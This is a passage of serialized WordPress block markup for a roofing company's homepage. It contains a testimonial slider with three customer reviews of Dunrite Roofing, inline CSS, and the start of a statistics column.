KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"be53c5bc\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-be53c5bc\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-be53c5bc\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4c086610-bd57-4da0-863d-9e60a966c85a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4c086610-bd57-4da0-863d-9e60a966c85a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"6b0e2ffd-e3fd-4707-bd8d-df424a1d4029\"} -->\n<style type=\"text/css\"> .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"bb519bbf-75d4-4620-a3da-12a30296f3eb\"} -->\n<style type=\"text/css\"> .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bb519bbf-75d4-4620-a3da-12a30296f3eb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"876ad3dc-62d4-4656-a484-5cb2941ef978\"} -->\n<style type=\"text/css\"> .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-876ad3dc-62d4-4656-a484-5cb2941ef978\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 